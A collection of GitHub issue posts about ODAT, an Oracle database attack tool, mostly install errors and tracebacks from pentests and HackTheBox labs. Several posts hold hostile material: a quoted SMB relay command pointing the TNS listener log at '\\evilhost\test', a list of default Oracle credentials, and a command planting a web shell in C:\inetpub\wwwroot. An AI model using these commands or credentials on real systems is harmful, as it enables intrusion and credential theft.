Hey,

I don't see, how to use it by service name. Is it possible ?.

Hello, I'm working on getting odat standalone up and running on a fresh Kali install.

Ive downloaded and unzipped the latest stand-alone zip (odat-linux-libc2.5-x86_64-v2.3.zip) and extracted it.

Running a scan with odat is successful, but attempting to connect to a database with the command;
./odat-libc2.5-i686 all -s [MY_TARGET_IP] -p 1521 -d acme -U SCOTT -P TIGER

results in;

[1] ([MY_TARGET_IP]:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] ([MY_TARGET_IP]:1521): Testing all modules on the acme SID with the SCOTT/TIGER account
[-] Impossible to connect to the remote database: `DPI-1047: 32-bit Oracle Client library cannot be loaded: "libclntsh.so: cannot open shared object file: No such file or directory". See https://oracle.github.io/odpi/doc/installation.html#linux for help`
21:15:15 CRITICAL -: Impossible to connect to the remote database: DPI-1047: 32-bit Oracle Client library cannot be loaded: "libclntsh.so: cannot open shared object file: No such file or directory". See https://oracle.github.io/odpi/doc/installation.html#linux for help

Looking up those errors seem to imply i need the oracle instant client, but I thought the point of the stand alone install was that we didnt need to install anything else. What am I missing?

Hi,

Can we have a separate module being a simple REPL interactive shell (with the possibility of providing SQL statements from a batch file - *.sql) offering nothing more than a pseudo-SQL shell? Similar thing to what Impacket offers through their mssqlclient.py.

Features they got there:

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     download {remote} {local}  - download a remote file to a local path
     upload {local} {remote}    - upload a local file to a remote path (OLE required)
     enable_ole                 - you know what it means
     disable_ole                - you know what it means

If we could have something similar - that would be awesome. I was just on the engagement where my SQL*Plus couldn't connect and ODAT easily did. However since all I had was this standalone version of ODAT - I couldn't write my own module quickly and thus wasn't really able to issue arbitrary SQL queries.

Can we have something like that?

Best regards,
Mariusz.

Hi!

I was testing out the tool and found a bug. I cloned the tool on a separate folder and then when accessing it from another directory by running /opt/odat/odat.py all -s $IP I get the following error:

[+] Checking if target $IP:1521 is well configured for a connection...
[+] According to a test, the TNS listener $IP:1521 is well configured. Continue...

[1] ($IP:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] ($IP:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the $IP:1521 server
Traceback (most recent call last):
  File "/opt/odat/odat.py", line 798, in <module>
    main()
  File "/opt/odat/odat.py", line 793, in main
    arguments.func(args)
  File "/opt/odat/odat.py", line 136, in runAllModulesOnEachHost
    runAllModules(args)
  File "/opt/odat/odat.py", line 185, in runAllModules
    validSIDsList = runSIDGuesserModule(args)
  File "/opt/odat/SIDGuesser.py", line 137, in runSIDGuesserModule
    sIDGuesser.searchKnownSIDs()
  File "/opt/odat/SIDGuesser.py", line 89, in searchKnownSIDs
    self.sids += self.__loadSIDsFromFile__()
  File "/opt/odat/SIDGuesser.py", line 52, in __loadSIDsFromFile__
    f = open(self.SIDFile)
FileNotFoundError: [Errno 2] No such file or directory: 'resources/sids.txt'

When running the script on the base folder of the repo, it works. Given that the file resources/sids.txt actually exist on the base folder, it makes me think that this path is not relative to the base folder but to the current dir of where the script is launched (pwd)

Hi, i've testing the standalone version in Oracle Linux 6 64bit, with oracle 12c, 1 cdb called cdb1 with 2 pdbs, pdb1_1 and pdb2_1

if i try:
./odat-libc2.5-x86_64 sidguesser -s ol6 -p 1521 --sids-min-size 6 --sids-max-size 6 --sid-charset bdp12_

it only detects sids cdb1 (as i have already added it to sids.txt) and pdb1_2 but not pdb1_1
if i try:
./odat-libc2.5-x86_64 sidguesser -s ol6 -p 1521 --sids-min-size 6 --sids-max-size 6 --sid-charset bdp112_
it detects cdb1 (as i have already added it to sids.txt) and both pdb1_1 & pdb1_2

so it seems its not trying to repeat characters from the charset.

For those interested I've made an updated version
https://gist.github.com/tsundokul/a4a5550dd94b6ce97481957d677ef988

Nice tool. The only thing to do at the moment it's to update Oracle Instant Client libraries to version 12.1.0.2.0 and create a 64bit version of the tool. Thank you for your work!

Traceback (most recent call last):
File "odat.py", line 569, in
main()
File "odat.py", line 564, in main
arguments.func(args)
File "/opt/odat/PasswordGuesser.py", line 185, in runPasswordGuesserModule
passwordGuesser.searchValideAccounts()
File "/opt/odat/PasswordGuesser.py", line 98, in searchValideAccounts
pbar,nb = self.getStandardBarStarted(len(self.accounts)), 0
File "/opt/odat/OracleDatabase.py", line 327, in getStandardBarStarted
return ProgressBar(widgets=['', Percentage(), ' ', Bar(),' ', ETA(), ' ',''], maxval=maxvalue).start()
File "/opt/odat/progressbar.py", line 213, in init
assert (maxval > 0),'maxval <= 0'
AssertionError: maxval <= 0

This error comes up when trying to use my own user/pass list.

I uninstalled and reinstalled a few times, following the install instructions to the dot.

Any advice on what to do will be helpful. Thank you

Hello,

I've just been trying the tool and noticed the text in the default accounts.txt file is uppercase. It seems to me that it would make sense to translate it lowercase as its more likely to be successful.

I am not very experienced with Oracle, or its history, so maybe there is a good reason for having this uppercase. However, after looking into it I see the following two arguments for making it lowercase:

1. Versions before 11 were case insensitive, so it should not affect old versions (which I think most of these credentials relate to).

2. In a modern version (I've tested with an XE version), when an account is unlocked the user needs to enter a password. In these cases, if the DBA is lazy enough to use a historic default, then I suspect it will be entered in lowercase 😉

Possibly, if there is a reason to have uppercase passwords. Maybe the file should contain both upper and lowercase variants?

Finally, after running a quick curl/grep/sed over cirt.net's Oracle default passwords the following entries (case-sensitive) are not included in the accounts.txt file. It might be worth adding them:

ADMIN/WELCOME
ADMIN/JETSPEED
APPLSYS/FND
APPLSYSPUB/FNDPUB
AURORA$JIS$UTILITY$/
OLAPSVR/INSTANCE
OLAPSYS/MANAGER
PORTAL30/PORTAL31
QS_CBADM/QS_CBADM
QS_CS/QS_CS
VIDEOUSER/VIDEO USER
CTXSYS/
REP_OWNER/DEMO
SYSMAN/OEM_TEMP
ADMINISTRATOR/admin
APPUSER/APPUSER
MDDEMO_MGR/MGR
SYS/D_SYSPW
SYSTEM/D_SYSTPW
internal/oracle
scott/tiger
scott/tigger
system/manager
demo/demo
oracle/oracle
sys/sys
admin/welcome
bpel/bpel
system/password

If I use --test-module I get the same salt each time for a specific user (I already know password)

If I use --get-all-passwords I get a different salt than for the test-module.

If I try decrypt-sessions on the known user it wont decrypt the values? :(

The login ADAMS has already been tested at least once. What do you want to do:

• stop (s/S)
• continue and ask every time (a/A)
• continue without to ask (c/C)
  someone module maybe not use,i want skip to the next

In the error message to enumerate users / password the "not found message is"

[-] No found a valid account on /. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'

For the username and password combo it states in the message "--accounts-file...." instead of "--accounts-files...."
I would ove to create a pull request but dont have the time right now.
Sorry if this is not the right way to report this.

Traceback (most recent call last):
File "./odat.py", line 5, in
from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser

sudo pip3 uninstall NmapParser 1 ⨯

Found existing installation: nmapparser 0.2.5
Uninstalling nmapparser-0.2.5:
Would remove:
/usr/local/lib/python3.9/dist-packages/nmapparser-0.2.5.dist-info/*
/usr/local/lib/python3.9/dist-packages/nmapparser/*
Proceed (y/n)? y
Successfully uninstalled nmapparser-0.2.5

sudo pip3 install NmapParser 1 ⨯

Collecting NmapParser
Using cached nmapparser-0.2.5-py3-none-any.whl
Installing collected packages: NmapParser
Successfully installed NmapParser-0.2.5

still get same error

./odat.py -h
Traceback (most recent call last):
File "./odat.py", line 5, in
from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser

/opt/odat   master ●  ./odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file accounts/oracle_default_userpass.txt

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
Traceback (most recent call last):
File "./odat.py", line 557, in
main()
File "./odat.py", line 552, in main
arguments.func(args)
File "/opt/odat/PasswordGuesser.py", line 185, in runPasswordGuesserModule
passwordGuesser.searchValideAccounts()
File "/opt/odat/PasswordGuesser.py", line 98, in searchValideAccounts
pbar,nb = self.getStandardBarStarted(len(self.accounts)), 0
File "/opt/odat/OracleDatabase.py", line 261, in getStandardBarStarted
return ProgressBar(widgets=['', Percentage(), ' ', Bar(),' ', ETA(), ' ',''], maxval=maxvalue).start()
File "/opt/odat/progressbar.py", line 213, in init
assert (maxval > 0),'maxval <= 0'
AssertionError: maxval <= 0

There seems to be a bug in the precompiled binaries that are provided for odat.
I believe it comes from oracle/python-cx_Oracle#49

When you use dbms_scheduler specifically, a boolean value is passed (auto_drop) and this is not properly handled by cx_Oracle, resulting in the following error message:

Error with DBMS_SCHEDULER.create_job:ORA-03115: unsupported network datatype or representation

I have tested on Oracle(11g XE) with module utlhttp:

[root@root odat]# ./odat.py utlhttp -s 10.10.10.200 -d xe -U system -P oracle --send 115.239.211.112 80 temp.txt
22:43:57 WARNING -: Impossible to set the timeout value: ORA-06550: line 1, column 7: PLS-00201: identifier 'UTL_HTTP' must be declared ORA-06550: line 1, column 7: PL/SQL: Statement ignored

[1] (10.10.200.231:1521): Send the HTTP request stored in the temp.txt file
[-] Impossible to send the request: ORA-06550: line 1, column 13: PLS-00201: identifier 'UTL_HTTP' must be declared ORA-06550: line 1, column 13: PL/SQL: Item ignored ORA-06550: line 1, column 31: PLS-00201: identifier 'UTL_HTTP' must be declared ORA-06550: line 1, column 31: PL/SQL: Item ignored ORA-06550: line 1, column 75: PLS-00320: the declaration of the type of this expression is incomplete or malformed ORA-06550: line 1, column 75: PL/SQL: Statement ignored ORA-06550: line 1, column 155: PLS-00320: the declaration of the type of this expression is incomplete or malformed ORA-06550: line 1, column 155: PL/SQL: Statement ignored ORA-06550: line 1, column 220: PLS-00320: the declaration of the type of this expression is incomplete or malformed ORA-06550: line 1, column 201: PL/SQL: Statement ignored ORA-06550: line 1, column 296: PLS-00320: the declaration of the type of this expression is incomplete or malformed ORA-06550: line 1, column 274: PL/SQL: Statement ignored ORA-06550: line 1, column 317: PLS-00201: identifier 'UTL_HTTP' must be declared ORA-06550: line 1, column 190: PL/SQL: Statement ignored

Hi,

Thanks for the tool.
Just thought it could be worth adding 'orclcdb' to the list of SIDs. It's been a few times I have seen it used, especially in default Oracle dev setup, but it's not included in the list.

I am trying to upload file using utilfile. I am working on machine Silo on HackTheBox

odat utlfile -s silo.htb -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ writeup.exe writeup.exe

Any help please

As you can see from this log, the specified output file doesn't get created.

➜  BUG ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug  1 21:47 .
drwxr-xr-x 5 root root 4096 Aug  1 21:34 ..
-rw-r--r-- 1 root root   28 Aug  1 21:35 blah.txt
➜  BUG python /opt/odat/odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file ../blah.txt --output-file output.txt --force-retry

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
[+] Valid credentials found: scott/tiger. Continue...
100% |######################################################################################################################################| Time: 00:00:00
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger

➜  BUG ls -la
total 16
drwxr-xr-x 2 root root 4096 Aug  1 21:48 .
drwxr-xr-x 5 root root 4096 Aug  1 21:34 ..
-rw-r--r-- 1 root root   10 Aug  1 21:48 10.10.10.82-1521-XE.odat.save
-rw-r--r-- 1 root root   28 Aug  1 21:35 blah.txt

The 10.10.10.82-1521-XE.odat.save file is created regardless of the --output-file flag and just contains the names from the blah.txt wordlist.
Not sure how to solve this as i haven't taken the time to analyze the source code yet.

It works although with v2.3 libc 2.5

Error mesage

/apps/odat-libc2.12-x86_64/odat-libc2.12-x86_64 dbmsxslprocessor -s $T -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot' 'cmd.aspx' './tools/win/shell.aspx'

[1] (IP:1521): Put the ./OSCP/tools/win/shell.aspx local file in the C:\inetpub\wwwroot\ path (named cmd.aspx) of the IP server
[-] The ./OSCP/tools/win/shell.aspx local file was not put in the remote C:\inetpub\wwwroot\ path (named cmd.aspx): ORA-06550: line 1, column 7: PLS-00306: wrong number or types of arguments in call to 'CLOB2FILE' ORA-06550: line 1, column 7: PL/SQL: Statement ignored

Hi just going through your install instructions and it dawned on me. Why dont you use easy_install and setup scrip to auto install all defendants? Take a look at this for an example https://bitbucket.org/laned/dirlist/overview. Im sure you have a good reason, and Im curious to hear what it is.

First of all thank you for your tool! I noticed a strange problem executing a dmsscheduler module with reverse shell parameter. When odat start listen to a specified port, it doens't match the port written in input after the IP but a random one

Hi,
I am having issues uploading a file using the latest release version of the tool:
OS: archlinux
error:

./odat-libc2.12-x86_64 utlfile -s X.X.X.X -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ test.exe test.exe                                
                                                                                                                                                                                                                                              
[1] (X.X.X.X:1521): Put the test.exe local file in the c:/ folder like test.exe on the X.X.X.X server                                                                                                   
Traceback (most recent call last):                                                                                                                                                                                                            
  File "odat.py", line 562, in <module>                                                                                                                                                                                                       
  File "odat.py", line 557, in main                                                                                                                                                                                                           
  File "UtlFile.py", line 305, in runUtlFileModule                                                                                                                                                                                            
  File "UtlFile.py", line 60, in putFile                                                                                                                                                                                                      
  File "UtlFile.py", line 38, in __createFile__                                                                                                                                                                                               
AttributeError: 'bytes' object has no attribute 'encode'                                                                                                                                                                                      
[14993] Failed to execute script odat

Am I doing something wrong ?

Thank you

Hello,

I experienced certain crashes when passing a single port on httpuritype scan-ports option with a single port. It also crashed with 80-80.

$ ./odat.py httpuritype -s IP -d SID -p PORT -U USER -P PWD --scan-ports HOST 80
05:19:56 ERROR -: Syntax for ports given not recognized (ex: 123-2452 or 143,134,4783)

Traceback (most recent call last):
  File "./odat.py", line 456, in <module>
    main()
  File "./odat.py", line 451, in main
    arguments.func(args)
  File "/home/epinna/tools/odat/HttpUriType.py", line 81, in runHttpUriTypeModule
    resultats = httpUriType.scanTcpPorts(httpObject=httpUriType,ip=args['scan-ports'][0],ports=ports)
  File "/home/epinna/tools/odat/Http.py", line 79, in scanTcpPorts
    pbar,nb = self.getStandardBarStarted(len(ports)),Queue.Queue(1)
  File "/home/epinna/tools/odat/OracleDatabase.py", line 243, in getStandardBarStarted
    return ProgressBar(widgets=['', Percentage(), ' ', Bar(),' ', ETA(), ' ',''], maxval=maxvalue).start()
  File "/home/epinna/tools/odat/progressbar.py", line 213, in __init__
    assert maxval > 0
AssertionError

Cheers

/opt/odat/odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp

The method used for SMB authentication is ctxsys.context, however according to this blog another method exists. Perhaps this is also interesting to be added.

https://erpscan.com/press-center/blog/smbrelay-bible-3-smbrelay-by-oracle/

"The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system."

We can use this method when we have ability for remote connection to TNS listener.

Before 10g TNS listener is not defended by password or ‘ADMIN_RESTRICTIONS' option by default. We should use ‘set_log' command for SMB relay.

The command ‘set_log' sets a way to TNS listener's log file. We can use either an original Oracle tool – ‘lsnrctl' or a Perl script – ‘tnscmd' to exploit this vulnerability.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL>set log_file \evilhost\test

Next connection to TNS-listener gives you necessary UNC-request for SMBrelay.

Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).
Kali is tracking Debian Testing and is thus affected by this. You should consider to switch odat to Python 3.

FWIW this is tracked in https://gitlab.com/kalilinux/packages/odat/issues/1 on the Kali side.

Hi, the tool was working fine until today I got this error message, I have followed all the instructions and installed all that requires for tool to work, need help in this please
root@kali:/opt/odat# ./odat.py
WARNING:root:You need to install python scapy if you want to use the CVE_2012_3137 module !
Traceback (most recent call last):
File "./odat.py", line 46, in
from CVE_XXXX_YYYY import CVE_XXXX_YYYY, runCVEXXXYYYModule
File "/opt/odat/CVE_XXXX_YYYY.py", line 5, in
from passlib.hash import oracle11 as oracle11
ImportError: No module named passlib.hash

hi, i've been testing the tool, and as i dont know phyton i cant get much into the code.
My question is how does the tool manage to discover valid username/passwords that are not listed in the *.txt files when i execute the tool with a user that only has create session privilege?
i found it not only discover the predefined users, but if i create any user with the same password as username it detects it!

The code in the dbmslob module doesn't really read the entire file because it goes word by word and messes up somewhere.
A simple way to check, is to read the /etc/passwd file and it fails to read the entire file.

                          IF (l_end = 0) THEN
                                l_end := DBMS_LOB.INSTR(l_loc,l_sen,l_pos,1);
                                l_sum := l_end - l_pos ;
                                DBMS_LOB.READ(l_loc,l_sum,l_pos,l_buf);
                                dbms_output.put_line(UTL_RAW.CAST_TO_VARCHAR2(l_buf));
                                EXIT;
                         END IF;

Commenting EXIT line from this code results in display of the entire file but naturally an exception occurs.

This was tested on the x64 precompiled binary.

I installed odat with all dependencies as directed.

When I try to start odat.py nothing happens, no errors as well as no feedback.
I used oracle version 21 and also tried version 19.9. Same issue on both.

# python3 odat.py -h

Any ideas what could be wrong?

You may want to modify the line 23 and 25 of Docker file.
I had to force https in order to install some packages.

pip install cx_Oracle -i https://pypi.python.org/simple/
pip install colorlog termcolor pycrypto argcomplete pyinstaller -i https://pypi.python.org/simple/

with python 3.8.5

got following errors when use module dbmsscheduler

Traceback (most recent call last):
  File "./odat.py", line 586, in <module>
    main()
  File "./odat.py", line 581, in main
    arguments.func(args)
  File "/root/odat/DbmsScheduler.py", line 178, in runDbmsSchedulerModule
    dbmsScheduler.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1])
  File "/root/odat/DbmsScheduler.py", line 128, in giveReverseShell
    CMD = '''/usr/bin/python -c exec('{0}'.decode('hex'))'''.format(PYTHON_CODE.encode('hex'))
LookupError: 'hex' is not a text encoding; use codecs.encode() to handle arbitrary codecs

The standalone build of 2.2.1 is advertised as x64, but is acutally built for i686.

haved troubles installing the requirement i installed pycryptodome instead and worked fine

Get the following exception:

0.1] Vulnerable to the CVE-2012-3137 ?
Exception in thread Thread-1:
Traceback (most recent call last):
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/threading", line 810, in __bootstrap_inner
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/threading", line 763, in run
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/CVE_2012_3137", line 106, in __sniff_sessionkey_and_salt__
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/scapy.sendrecv", line 561, in sniff
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/scapy.arch.linux", line 463, in __init__
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/scapy.arch.linux", line 135, in attach_filter
  File "./build/odat-libc2.5-i686/out00-PYZ.pyz/socket", line 224, in meth
error: [Errno 22] Invalid argument

Standalones 1.5 b7457041be37e40dc09

Hi, sorry for the beginner question but how should i use the standalone installers? All I see is the zip files with the source code or the .tar.gz that has all the libraries. Should I compile something or am I missing the standalone executable somewhere?

Thanks!

Running the following

/u01/app/oracle/product/19.0/bin/sqlplus USERNAME/password@sid_tls works fine from the server itself. I get the following when i run odat from the server itself.

./odat-libc2.17-x86_64 privesc --get-privs -s 127.0.0.1 -p 1521 -vvv -U "USERNAME" -d sid_tls -P "password" -vvv

02:11:40 INFO -: CX_Oracle is well configured according to parameters
02:11:40 DEBUG -: cx_Oracle Version: 8.3.0
02:11:40 DEBUG -: Oracle Client Version: (12, 2, 0, 1, 0)
02:11:40 DEBUG -: PrivilegeEscalation object created
02:11:40 DEBUG -: OracleDatabase module created
02:11:40 DEBUG -: TNS Connection string mode enabled and SERVICE NAME used for connection string
02:11:40 DEBUG -: Oracle connection string: USERNAME/password@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(Host=127.0.0.1)(Port=1521)))(CONNECT_DATA=(SERVICE_NAME=sid_tls)))
02:22:17 CRITICAL -: Impossible to connect to the remote database: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor

DB is oracle express 19.
I've tried using the hostname, physical IP address instead of hostname, used TCP port the SID instead of the default oracle port, tried using service name instead of SID all with the some outcome.

Any ideas what the problem might be ?

Hello!

Here you can find the update docker file.
Hope it helps!

And thanks for the nice tool!
Dockerfile.txt

Br.
Juhani

Hiya,

I have been working with the tool alot lately and i noticed some things that could improve the tool abit. Hopefully you have some time to implement these features!

When brute forcing SIDs, a min size option (--sids-min-size) would be really helpful if you already bruted the first 1-4 characters find nothing and want to scan for 5. This way you don't have to go through all other 1-4 SIDs again.

Also when doing brute forcing SIDs/accounts, real time printing of found info would save alot of time during pentests. Right now you have to wait up until all is finished, especially when bruting SIDs with higher character amounts this is really helpful.

Thanks for the awesome tool!

My code for versions 18 and later:
if len(hexVsnnum) == 7:
hexVersionList = struct.unpack('cc2sc2s',hexVsnnum)
elif len(hexVsnnum) == 8:
hexVersionList = struct.unpack('2sc2sc2s',hexVsnnum)

I ran into the UnicodeDecodeError when I ran odat on the passswordguesser module:

root@kali:~/Projects/odat# ./odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file accounts/accounts_small.txt

Traceback (most recent call last):
File "./odat.py", line 562, in
main()
File "./odat.py", line 557, in main
arguments.func(args)
File "/root/Projects/odat/PasswordGuesser.py", line 182, in runPasswordGuesserModule
args['print'].title("Searching valid accounts on the {0} server, port {1}".format(args['server'],args['port']))
File "/root/Projects/odat/Output.py", line 31, in title
m = m.encode(encoding='UTF-8',errors='ignore')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 43: ordinal not in range(128)

I was about to suggest a PR for something you already fixed in version 4.3... 👍
Kali is stuck on 4.2 probably because you didn't tag this release. Can you please try doing it?

Hi when I run I gotten below output, how do I solve thanks